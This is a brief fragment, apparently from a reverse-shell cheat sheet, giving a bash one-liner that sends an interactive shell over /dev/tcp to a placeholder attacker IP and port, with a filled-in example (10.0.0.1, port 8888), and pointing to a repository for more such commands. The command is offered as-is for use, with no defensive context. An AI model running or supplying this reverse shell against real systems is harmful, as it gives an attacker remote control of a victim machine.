Bash TCP
$ bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1 # eg. $ bash -i >& /dev/tcp/10.0.0.1/8888 0>&1
Refer to the resources under Repository section for more examples
Repository
Last updated 22 days ago